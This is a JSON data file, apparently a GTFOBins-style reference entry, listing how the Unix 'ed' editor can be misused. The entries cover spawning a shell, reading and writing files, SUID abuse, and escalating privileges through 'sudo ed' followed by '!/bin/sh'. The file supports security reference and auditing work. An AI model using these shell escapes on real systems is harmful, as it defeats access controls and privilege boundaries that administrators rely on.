You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

35 lines
496 B
JSON

{
"functions": {
"shell": [
{
"code": "ed\n!/bin/sh\n"
}
],
"file-write": [
{
"code": "ed [file]\na\nDATA\n.\nw\nq\n"
}
],
"file-read": [
{
"code": "ed [file]\n,p\nq\n"
}
],
"suid": [
{
"code": "./ed [file]\n,p\nq\n"
}
],
"sudo": [
{
"code": "sudo ed\n!/bin/sh\n"
}
],
"limited-suid": [
{
"code": "./ed\n!/bin/sh\n"
}
]
}
}